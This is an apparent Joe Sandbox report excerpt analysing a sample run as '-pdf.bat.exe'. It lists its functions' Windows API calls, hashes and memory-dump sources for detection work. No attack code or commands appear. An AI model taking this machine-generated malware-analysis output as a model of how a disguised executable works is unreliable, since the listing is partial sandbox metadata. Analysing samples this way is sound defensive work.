                                                                                                                                                Similarity
                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                • Opcode ID: fe6b0462bbb9c812055640b7e05a812a5f0f6476a15b8fe0613a818189b17234
                                                                                                                                                • Instruction ID: b0fab6ada048a007bc7a9e7ea159b859fb2c46f1cf0919f9de2b856f0b768ccb
                                                                                                                                                • Opcode Fuzzy Hash: fe6b0462bbb9c812055640b7e05a812a5f0f6476a15b8fe0613a818189b17234
                                                                                                                                                • Instruction Fuzzy Hash: 3501B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A21C0D7B86904866A
                                                                                                                                                Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                • Opcode ID: 21baafe9a7a0f76613877036fe6656a1d903344fa510fbd339b417530e455d25
                                                                                                                                                • Instruction ID: 290020a6ffb3b0b642d393fb7515e003cd99aebe452f8161eadcedbee24de40e
                                                                                                                                                • Opcode Fuzzy Hash: 21baafe9a7a0f76613877036fe6656a1d903344fa510fbd339b417530e455d25
                                                                                                                                                • Instruction Fuzzy Hash: 65014732B102309BD7296F28EC08B2A3698A790711F55053EF901F72F1D6B8CC06839C
                                                                                                                                                Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                                • Opcode ID: 58e93c502c6760cf7afac41f66f3caaeb4af238a1542128eb1103078922c963e
                                                                                                                                                • Instruction ID: 362cb4f6b20b44c4732fe0c2e8830287d718b01241407342bacb51c37ffe1250
                                                                                                                                                • Opcode Fuzzy Hash: 58e93c502c6760cf7afac41f66f3caaeb4af238a1542128eb1103078922c963e
                                                                                                                                                • Instruction Fuzzy Hash: D6F02433645600A7E210ABA49D4AA7E765DAB903A2F11053FF642B61C4CEBE8C46866D
                                                                                                                                                Function 00402048 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                • Opcode ID: 891da5ed0a96c49853c0618874e93badcd3494bf22b074912de49e1286eaee8a
                                                                                                                                                • Instruction ID: d3ea980f862b26b5144c0637eecc05b71e9f62faeec01463a38ba2c80611de59
                                                                                                                                                • Opcode Fuzzy Hash: 891da5ed0a96c49853c0618874e93badcd3494bf22b074912de49e1286eaee8a
                                                                                                                                                • Instruction Fuzzy Hash: 5EE026726083009FE314AF20E94E96AB768EB40326F20443FF940B40C1CBBE2C4186BE
                                                                                                                                                Function 00406A30 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004034D0,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00406A34
                                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 00406A54
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                • Opcode ID: 2636aa4b6e8d56909014eda2f457a88b1db290e94deca41eabb4e2e5bf5542ae
                                                                                                                                                • Instruction ID: 6944e5d097c49adef6872dbe64bc52011f165bd8882031d975811287a59293c5
                                                                                                                                                • Opcode Fuzzy Hash: 2636aa4b6e8d56909014eda2f457a88b1db290e94deca41eabb4e2e5bf5542ae
                                                                                                                                                • Instruction Fuzzy Hash: C1D09E71118201AEDF054F20DE4AF1FBA65EF84711F114A2CF2A5940F0DA718825AB15
                                                                                                                                                Function 00402AF5 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                • Opcode ID: c9684272530c97a3937d2c2dd0a9e88e4371c21dc146d787c3a44186b09c15e4
                                                                                                                                                • Instruction ID: bb3698166f2f7887da60b512e7e280e5d3ba2552d442c0d01900f7df534159fe
                                                                                                                                                • Opcode Fuzzy Hash: c9684272530c97a3937d2c2dd0a9e88e4371c21dc146d787c3a44186b09c15e4
                                                                                                                                                • Instruction Fuzzy Hash: CBE0DF722452007FD600AB11ED8AC3FB31CEB8031EF04483FF504A40C1C67E280186AA
                                                                                                                                                Function 00406A5D Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000,004149F0,-0032BFAE,?,00000000,0040312E,?,?,00403292,004149F0,-0032BFAE), ref: 00406A74
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                                                                                • Instruction ID: 385196eb23d11a36dc6e38e8ab68dc4ec2e70565b983062d54c52da8055020ce
                                                                                                                                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                                                                                • Instruction Fuzzy Hash: B0E0BF7220011ABB8F205B8ADD04D9FBFADEE966A07114026B905A6150D670EA11DAE4
                                                                                                                                                Function 00406B20 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,0041B41F,-0032BFAE,?,00000000,0040322C,004189F0,0041B41F,004149F0,-0032BFAE,?,004032F7), ref: 00406B37
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: 918db18773234dd27a4ccea7b05120dde1c36639e2429e3c910a208a0e7f3d6c
                                                                                                                                                • Instruction ID: 1f3280817f598c96c51f842603ae3c0d9e7838c34cd32eb3dba11bf4455027e8
                                                                                                                                                • Opcode Fuzzy Hash: 918db18773234dd27a4ccea7b05120dde1c36639e2429e3c910a208a0e7f3d6c
                                                                                                                                                • Instruction Fuzzy Hash: 57E0B6B2200129BB8F209B8ADD08D9FFFBDEE957A07124036F905E6150D674EA11D6E4
                                                                                                                                                Function 004063BA Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004063E3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                                                                                                                                • Instruction ID: 20d2b18cbbbfb2fbef22a2957ce1d045c06c2643f5e2d934d02d27322de197f6
                                                                                                                                                • Opcode Fuzzy Hash: a0b6da99e5e71265e8373ba8059e24fe5c697144cc542e2b776cf21a3b2d53e8
                                                                                                                                                • Instruction Fuzzy Hash: 75E0B6B2010209BEEF095F90ED0AEBB361DEB08310F01852EBE06E4091E6B5ED30A675
                                                                                                                                                Function 70311A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNELBASE(7031501C,?,?,70315034), ref: 70311A68
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 7ffadcbdbd200e649b60874f5986c648bfabf7abe24a70edac637cffcd16f495
                                                                                                                                                • Instruction ID: 0b4c47e1ee445b832589b69b20262e4c45f4e59257d2d40d53fc65d54a33fd8c
                                                                                                                                                • Opcode Fuzzy Hash: 7ffadcbdbd200e649b60874f5986c648bfabf7abe24a70edac637cffcd16f495
                                                                                                                                                • Instruction Fuzzy Hash: CDF0AC76919B41DEC318CF9EDC847097AE8B71C344B21C52FF649DB360C37085409B9A
                                                                                                                                                Function 004063ED Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00424230,00000000,00000800,00424230,?,00406ABA,00000800,?,?,?,Call,00000000,00000000), ref: 00406411
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                                                                                • Instruction ID: c4076ac10ec322d1f621b48464b0146dd55e4c4a2c3eba9e58b2c244d89ab2f2
                                                                                                                                                • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                                                                                • Instruction Fuzzy Hash: 3CD0123200020DBBDF116E909D05FAB372DEB04350F01482AFE06A4091D775D530AB19
                                                                                                                                                Function 0040561D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • SetDlgItemTextW.USER32(?,?,00000000), ref: 00405637
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemTextlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3433768297-0
                                                                                                                                                • Opcode ID: 0a47412119046910f8567a3edcb2020fc28baccfd11460674a2097b00f1d61e3
                                                                                                                                                • Instruction ID: 789d532d0cfa21274277a88f6342db929b0c0901db561bf65b50e3de0f7c97c4
                                                                                                                                                • Opcode Fuzzy Hash: 0a47412119046910f8567a3edcb2020fc28baccfd11460674a2097b00f1d61e3
                                                                                                                                                • Instruction Fuzzy Hash: 37C04C7514C641BFE642A755CC42F1FB799EF94315F00C92EB59CE51D1CA3984309A26
                                                                                                                                                Function 004055EB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004055FD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
